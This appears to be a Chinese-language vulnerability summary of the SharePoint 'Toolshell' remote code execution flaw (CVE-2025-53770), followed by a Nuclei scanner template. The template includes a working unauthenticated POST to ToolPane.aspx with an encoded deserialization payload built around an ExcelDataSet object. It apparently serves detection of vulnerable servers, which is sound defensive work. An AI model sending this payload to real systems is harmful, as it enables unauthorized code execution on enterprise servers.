Microsoft SharePoint Remote Code Execution Toolshell Vulnerability

漏洞信息

漏洞名称： Microsoft SharePoint Remote Code Execution “Toolshell” Vulnerability

漏洞编号：

• CVE： CVE-2025-53770

漏洞类型： 反序列化

漏洞等级： 严重

漏洞描述： Microsoft SharePoint是一款广泛使用的企业级协作平台，支持文档管理、内容管理、社交网络等功能，广泛应用于企业内部和外部的团队协作中。该漏洞涉及SharePoint的Web Part编辑器，允许攻击者在未经认证的情况下访问，并通过请求体中的对象不安全反序列化执行代码。具体来说，漏洞的根源在于SharePoint在处理特定请求时，未能正确验证和清理用户输入，导致攻击者可以构造恶意的序列化对象，进而在服务器上执行任意代码。这种漏洞的利用无需用户交互，攻击者可以远程触发，对受影响系统构成严重威胁。成功利用此漏洞的攻击者可以完全控制受影响的SharePoint服务器，执行任意代码，访问敏感数据，甚至进一步渗透企业内部网络。由于SharePoint在企业中的广泛应用，此漏洞的影响范围可能非常广泛，需要立即采取措施进行修补。

产品厂商： Microsoft

产品名称： SharePoint

来源： https://github.com/projectdiscovery/nuclei-templates/blob/5ee39e98afc70848cf8805e5975243f7e9e06ca7/http%2Fcves%2FCVE-2025-53770.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2025-53770

info:
  name: Microsoft SharePoint - Remote Code Execution "Toolshell"
  author: SamIntruder
  severity: critical
  description: |
    A combination of two issues in Microsoft SharePoint allows an attacker to access the Web Part editor without authentication, and then via insecure deserialization of an object in the request body, execute code.
  impact: |
    Vulnerable versions of SharePoint on-premises can be exploited to execute chosen code.
  reference:
    - https://cvemon.intruder.io/cves/CVE-2025-53770
    - https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/
    - https://github.com/hazcod/CVE-2025-53770
  classification:
    cve-id: CVE-2025-53770
    cvss-score: 9.8
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  metadata:
    max-request: 1
  tags: cve,cve2025,sharepoint,rce

requests:
  - raw:
    - |
      POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
      Host: {{Host}}
      Referer: /_layouts/SignOut.aspx
      Content-Type: application/x-www-form-urlencoded

      MSOTlPn_Uri={{Scheme}}://{{Host}}&MSOTlPn_DWP=%0A%3C%25%40%20Register%20Tagprefix%3D%22Scorecard%22%20Namespace%3D%22Microsoft%2EPerformancePoint%2EScorecards%22%20Assembly%3D%22Microsoft%2EPerformancePoint%2EScorecards%2EClient%2C%20Version%3D16%2E0%2E0%2E0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D71e9bce111e9429c%22%20%25%3E%0A%3C%25%40%20Register%20Tagprefix%3D%22asp%22%20Namespace%3D%22System%2EWeb%2EUI%22%20Assembly%3D%22System%2EWeb%2EExtensions%2C%20Version%3D4%2E0%2E0%2E0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35%22%20%25%3E%0A%3Casp%3AUpdateProgress%20ID%3D%22UpdateProgress1%22%20DisplayAfter%3D%2210%22%20runat%3D%22server%22%20AssociatedUpdatePanelID%3D%22upTest%22%3E%0A%20%20%3CProgressTemplate%3E%0A%20%20%20%20%3Cdiv%20class%3D%22divWaiting%22%3E%0A%20%20%20%20%20%20%3CScorecard%3AExcelDataSet%20CompressedDataTable%3D%22H4sIAADEfmgA%2F4WRX2uzMBTG7%2F0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9%2BPEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c%2Bc1Umalp33%2F0%2F62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl%2BftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S%2FVeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1%2Bt%2Fpbj%2BvyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA%3D%22%20DataTable%2DCaseSensitive%3D%22false%22%20runat%3D%22server%22%3E%3C%2FScorecard%3AExcelDataSet%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%20%20%3C%2FProgressTemplate%3E%0A%3C%2Fasp%3AUpdateProgress%3E%0A

    extractors:
      - type: regex
        part: body
        regex:
          - 'CompressedDataTable="(.*?)"'
        name: encoded_response
        group: 1
        internal: true

    matchers:
      - type: dsl
        name: decoded_response
        dsl:
          - contains(gzip_decode(base64_decode(encoded_response)), "IntruderScannerDetectionPayload")